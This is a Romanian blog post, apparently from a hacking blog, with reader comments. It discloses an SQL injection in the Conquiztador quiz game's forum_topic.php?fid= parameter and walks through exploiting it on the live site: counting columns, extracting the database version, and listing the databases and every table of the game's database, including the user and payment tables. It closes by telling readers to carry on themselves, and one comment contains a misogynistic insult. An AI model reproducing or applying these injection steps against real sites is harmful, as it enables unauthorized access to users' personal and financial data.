United
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Ce servicii de mail folositi? in (121 Visits)
- Azi este ziua userilor hackersblog.org in (120 Visits)
- De reţinut in (117 Visits)
- Inca o pierdere de timp in (107 Visits)
- De tinut minte in (106 Visits)
- Twitter in (78 Visits)
- Un nou membru in (74 Visits)
- Interviu la Radio Lynx in (70 Visits)
- 2009 in (51 Visits)
- Editori noi. in (35 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (199 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (139 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (104 Visits)
- B7ackAnge7z (1)
- Nicu Calcea (1)
- andrasi zsolt (1)
- Ovidiu U (1)
- Dumitru (1)
- Andrei Rinea (1)
Posted on November 24th, 2008
Da…again. Cu putin timp in urma am descoperit parametrul companyid= vulnerabil. Atunci n-am facut public sintaxa pentru extragerea datelor. Adminii au primit mail, si au securizat iesirea. Conquiztador este un joc,ce se joaca in multe tari,pe aceasi platforma. Doar cel din ro avea adaugat parametrul logoclick.php?companyid= . Pentru ce credeti ca era? Pentru a face reclama. Si cui? Desigur,in mare parte,firmelor apartinatoare trustului Pro.
Dar…si zic dar, pentru ca de data asta parametrul descoperit vulnerabil este global,valabil pentru toate platformele tarilor in care se joaca jocul.(O simpla cautare pe google inurl:”forum_topic.php?fid=” va convinge)Deci parametrul vulnerabil este fid= in sintaxa forum_topic.php?fid= .Totusi pentru a putea exploata vulnerabilitatea avem nevoie de niste cunostinte sql, deoarece rezultatele nu sunt afisate simplu, in text clar.
Dar un mic exercitiu poate sa faca oricine. Sa luam adresa:http://www.conquiztador.ro/forum_topic.php?fid=5
si aflam numarul coloanelor: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, adica apare pagina originala. Inlocuim 1 cu 2 si tot asa pana la 5, true… La 6 vom avea http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* eroare, deci avem 5 coloane.
Acum sa aflam versiunea bazei de date
select 1,unhex(hex(@@version)),3,4,5 vom avea drept rezultat: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
Numele bazelor de date sunt:
[*] cq_ro
[*] information_schema
[*] mysql
[*] mysql_old
[*] test
Pe noi ne intereseaza cq_ro. Tabele acestei baze de date sunt:
aa_unban2
aa_unban3
aa_users_chat_save
aa_users_unban
ad_download
addrbook
adperiods
advert
agecategory
askedgroups
auct_cycle
auct_hist
auct_item
auct_win
badmarking_mcq
badmarking_tq
badquestion
balance_change
balance_users
banner
bannerplace
bannerplace_old
bctrack
bctrack_user
brokenconn
cachecontrol
chatmsg
cities
clientactionlog
clinks
companies
competition
competition_games
compticket
compuser_codes
compusers
connections
costingames
countries
county
cqusers
ctrldata
dbsmlog
dbsmver
dbversion
deletedquestions
division
eventlog
faq
forum_cat
forum_msg
forum_topic
forum_topic_last
game
helppages
inv_head
inv_item
inv_unit
item_dnloads
jepgen
jeprecalc
lanswers
layerpopup
links
linktrace
login_log
loginq
loginq_temp
logins
logo_download
lqj_answers
lqj_question
lqj_targetcity
lqj_useransw
mailhead
mailmsg
mailmsg_del
moderatorlog
moneychange
moneymovecode
moneyticket
monthlystats_temp
msgfilter
news
news_head
newsletter
newslettersend
online
parameters
preloader
preloader_date
preloader_downcount
preloaderconf
qhistory
qrating
question
questioncat
questionclass
questionratinglog
questionrow
reportx
rl_competition
rl_competition_users
rl_day
rl_day_prev
rl_games
rl_jep
rl_knl_day
rl_knl_day_temp
rl_stu_grp
rl_vep
sanyistat
settings
smith_repro
smith_robot
stu_game
stu_usergame
stu_userpoints
themegroup
themes
ticketcodeerror
tipgroup
tiphistory
tipquestion
tipquestionrow
tiprating
tipthemes
tournament_fgames
tournament_qresults
tournament_usergame
tournament_users
tournaments
user_clicks
useragent
useransstat
usergame
usergame_comp
userpoints
userpoints_comp
users
users_addr
users_chat
users_data
users_email
users_extra
users_flaggers
users_forum
users_gold_temp
users_gold_temp2
users_locations
users_names
users_names_deny
users_presence
users_questions
users_questions_action
users_questions_admindesc
users_secureq
ws_basket
ws_cat
ws_deliver
ws_images
ws_itemmove
ws_movetype
ws_orderhead
ws_orderitem
ws_orderstates
ws_product
zipcodes
Mai departe faceti voi.
December 9th, 2008 at 9:54 am
[...] primit azi următorul link de la Danv. Dacă o să citiţi postarea de pe hackersblog o să vedeţi cât de banală este [...]
December 9th, 2008 at 2:08 pm
culmea e ca nici acum n-au securizat parametrul, deci e vulnerabil in continuare (degeaba au fost anuntati)
December 17th, 2008 at 9:14 pm
am incercat sa aflu explicatii de la moderatori si mi-a dat oana aia ban. se comporta ca atunci cand au aparut codurile. cre’ca le e greu sa recunoasca cand gresesc si moderatorii sunt mai inapti decat aia vechi. asa e cand pui femei proaste la conducere
December 17th, 2008 at 9:14 pm
[...] Pentru continuare si mai multe informatii cititi articolul intreg pe HackersBlog.org! [...]
January 2nd, 2009 at 10:47 pm
Btw, stiti de ce le merge site-ul asa “bine”? De prin Mai parca au introdus sistemul de criptare RSA in conexiunea jocului… la atatea numere prime mi se pare normal sa se blocheze
… Iar decriptarea mie imi ia cam 2-3 secunde. Stie careva daca mai merge aflarea variabilelor din javascript?
January 4th, 2009 at 12:46 am
Din cate am inteles versiunea romaneasca are o criptare mult mai eficienta decat versiunile celorlalte tari si sansele de a trece de aceasta criptare si de a creea un nou cheat s-au micsorat considerabil.
February 26th, 2009 at 5:40 am
Diese seite ist genauso interessant wie informativ. Viele Grüße!
March 20th, 2009 at 6:21 am
Nice work chief
March 20th, 2009 at 6:23 am
Spent some great time in your site, really enjoyed it
March 20th, 2009 at 6:24 am
Exstremely lovely site. Very impressed about all the lesson there are to learn and to know how much help is there also. Keep up the great work